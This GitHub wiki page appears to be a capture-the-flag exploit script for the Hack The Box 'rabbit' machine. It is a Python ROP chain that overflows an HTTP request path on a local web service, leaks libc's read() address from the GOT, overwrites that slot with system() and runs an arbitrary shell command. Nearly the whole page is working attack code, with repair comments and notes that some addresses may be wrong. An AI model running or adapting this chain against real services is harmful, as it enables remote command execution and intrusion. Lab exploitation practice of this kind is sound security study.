omg_smasher - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
from pwn import *

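# omg_smasher: ROP chain against the htb-rabbit web service on 127.0.0.1:9999.
#
# Python 3 (run it with `python3`; the `#!/usr/bin/python` shebang above predates
# this version). The wiki rendering of the original mangled the source (smart quotes,
# "0×" for "0x", "sys.argv1" for "sys.argv[1]", lost "[0]", a markdown list eating a
# comment); this is the same chain with those repaired and the stages named.
#
# Stages, one helper each (see build_rop_chain()):
#   1. dup2(SOCKET_FD, 0), dup2(SOCKET_FD, 1)  make stdin/stdout the client socket (see NOTE)
#   2. read(0, .dynamic, rdx)                  store the NUL-terminated command we send next
#   3. write(1, read@got, rdx)                 leak libc's read() address back to us
#   4. read(0, read@got, rdx)                  we answer with libc system(); GOT slot overwritten
#   5. read@plt (now system())                 see NOTE in _system_stage() about rdi
#
# Caveats before pointing this at anything:
#   * LIBC_*_OFFSET are specific to one libc build; derive them with `readelf -s libc.so.6`.
#   * Every 0x40xxxx / 0x60xxxx value is absolute, i.e. the target binary is non-PIE.
#   * The chain never sets rdx, so each read()/write() count is whatever rdx happens to hold.
#   * The command is written over .dynamic; any later lazy PLT resolution sees corrupted entries.

ADDR = ("127.0.0.1", 9999)
SOCK_TIMEOUT = 15.0  # seconds; a stalled leak or reply fails loudly instead of hanging forever

# Symbol offsets inside the target's libc build. Reusing them against another libc
# silently produces a wrong system() address (libc_base_from_read_leak() catches
# only the cases where the computed base is not page aligned).
LIBC_READ_OFFSET = 0xE8050
LIBC_SYSTEM_OFFSET = 0x42510
# system() with ASLR disabled (gdb); kept as a debugging reference, never sent.
SYSTEM_ADDR_NO_ASLR = 0x7FFFF7A60510

# Addresses in the target binary (absolute: assumes non-PIE).
POP_RDI_RET = 0x4011DD          # pop rdi ; ret
POP_RSI_POP_R15_RET = 0x4011DB  # pop rsi ; pop r15 ; ret
READ_PLT = 0x400CF0             # 0000000000400cf0 <read@plt>
WRITE_PLT = 0x400C50            # write@plt
READ_GOT = 0x603088             # GOT slot holding libc read() once resolved
DYNAMIC = 0x602E28              # .dynamic: known-writable scratch area for the command string
DUP2_LIBC = 0xE8980             # "dup2_libc" in the original; see the NOTE in _dup2_stage()
SOCKET_FD = 4                   # client socket fd inside the target ("stdin/stdout for app")

OVERFLOW_OFFSET = 568     # bytes from the start of the request path to the saved return address
PATH_START = rb"\AAAA"    # first bytes of the path; they count towards OVERFLOW_OFFSET

_QWORD = struct.Struct("<Q")


def p64(value):
    """Pack *value* as a little-endian 64-bit qword (pwntools' p64, without pwntools)."""
    return _QWORD.pack(value)


def _call2(target, rdi, rsi):
    """ROP fragment that loads rdi and rsi, then returns into *target*.

    Only rdi and rsi are set: the chain has no rdx gadget, so for read()/write()
    the byte count is whatever rdx holds when the PLT stub runs.
    """
    return (p64(POP_RDI_RET) + p64(rdi)
            + p64(POP_RSI_POP_R15_RET) + p64(rsi) + p64(0)  # the 0 is popped into r15 (unused)
            + p64(target))


def _dup2_stage():
    """Stage 1: dup2(SOCKET_FD, 0) then dup2(SOCKET_FD, 1), so later read(0)/write(1) hit the socket.

    NOTE(review): DUP2_LIBC (0xe8980) has the magnitude of a libc *offset* (compare
    LIBC_READ_OFFSET = 0xe8050) but is placed in the chain as an absolute return
    address; with no libc leak yet it cannot land on dup2(). The wiki renders this
    stage indented like a side note, so it may have been disabled in the working
    run. Whether fds 0/1 already are the client socket depends on how the target is
    launched -- confirm before relying on this stage.
    """
    return _call2(DUP2_LIBC, SOCKET_FD, 0) + _call2(DUP2_LIBC, SOCKET_FD, 1)


def _system_stage():
    """Stage 5: return into read@plt, whose GOT slot holds system() after stage 4.

    NOTE(review): the first qword is the address stage 4's read@plt returns into,
    and nothing in the chain points rdi at DYNAMIC (where the command was written);
    the original labels it "bogus, junk". A POP_RDI_RET here would turn this into
    system(DYNAMIC) -- confirm against a working run before changing it.
    """
    return (p64(0x00)          # "bogus, junk" in the original
            + p64(DYNAMIC)     # address of the command string
            + p64(READ_PLT))   # read@plt -> libc system() once stage 4 has run


def build_rop_chain():
    """Return the bytes that follow b"GET /" + PATH_START in the request.

    That is the padding up to the saved return address followed by the five
    ROP stages described at the top of the file.
    """
    chain = b"A" * (OVERFLOW_OFFSET - len(PATH_START))
    chain += _dup2_stage()
    chain += _call2(READ_PLT, 0, DYNAMIC)     # stage 2: read(0, .dynamic, rdx) <- our command
    chain += _call2(WRITE_PLT, 1, READ_GOT)   # stage 3: write(1, read@got, rdx) -> leak read()
    chain += _call2(READ_PLT, 0, READ_GOT)    # stage 4: read(0, read@got, rdx) <- system() address
    chain += _system_stage()
    return chain


def build_request(rop_chain):
    """Wrap *rop_chain* in the curl-lookalike GET request the original script sends.

    The chain travels inside the request path; the bare-"\\n" line endings and the
    trailing blank lines are kept exactly as in the original.
    """
    return (b"GET /" + PATH_START + rop_chain + b" HTTP/1.1\n"
            + b"Host: localhost:9999\n"
            + b"User-Agent: curl/7.60.0\n"
            # The wiki shows "Accept: /"; markdown swallowed the asterisks of curl's
            # default "*/*" header. Harmless either way -- confirm if the server cares.
            + b"Accept: */*\n"
            + b"\n\n")


def recv_exact(sock, nbytes):
    """Read exactly *nbytes* from *sock*; raise EOFError if the peer closes first."""
    buf = bytearray()
    while len(buf) < nbytes:
        chunk = sock.recv(nbytes - len(buf))
        if not chunk:
            raise EOFError("peer closed after %d of %d bytes" % (len(buf), nbytes))
        buf.extend(chunk)
    return bytes(buf)


def recv_until_close(sock):
    """Collect everything the peer sends until it closes or the socket timeout fires."""
    out = bytearray()
    while True:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break   # target did not close; it normally crashes after system() returns
        if not chunk:
            break
        out.extend(chunk)
    return bytes(out)


def libc_base_from_read_leak(read_addr):
    """Derive the libc load base from the leaked address of read().

    Raises ValueError when the result is not page aligned: then the 8 bytes we got
    were not read()'s libc address (e.g. a still-unresolved GOT slot) or
    LIBC_READ_OFFSET belongs to a different libc build.
    """
    base = read_addr - LIBC_READ_OFFSET
    if base & 0xFFF:
        raise ValueError("leaked read() 0x%x gives non-page-aligned libc base 0x%x; "
                         "check LIBC_READ_OFFSET against the target's libc" % (read_addr, base))
    return base


def system_from_read_leak(read_addr):
    """Address of libc system() given the leaked address of read() in the same libc."""
    return libc_base_from_read_leak(read_addr) + LIBC_SYSTEM_OFFSET


def main(argv=None):
    """Run the exploit; argv[1] is the shell command the target's system() executes.

    Returns a process exit status. Network errors, a short leak (EOFError) and an
    implausible leak (ValueError) propagate as tracebacks.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) != 2:
        sys.stderr.write("usage: %s '<shell command>'\n" % argv[0])
        return 2
    cmd = argv[1].encode() + b"\0"   # NUL-terminated: system() reads it as a C string from .dynamic

    with socket.create_connection(ADDR, timeout=SOCK_TIMEOUT) as s:
        s.sendall(build_request(build_rop_chain()))
        s.sendall(cmd)                                   # consumed by stage 2's read(0, .dynamic)

        # Stage 3 writes read@got back to us. Only the first 8 bytes are the address;
        # anything beyond (rdx > 8) is picked up with the command output below.
        read_addr = struct.unpack("<Q", recv_exact(s, 8))[0]  # keep this line
        print("libc read() found at 0x%.8x" % read_addr)      # keep this line
        system_addr = system_from_read_leak(read_addr)
        print("libc system() found at 0x%.8x" % system_addr)
        s.sendall(struct.pack("<Q", system_addr))             # lands in read@got (stage 4)

        # Command output comes back on the same socket (the target's fd 1).
        sys.stdout.buffer.write(recv_until_close(s))
        sys.stdout.buffer.flush()
    return 0


if __name__ == "__main__":
    sys.exit(main())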
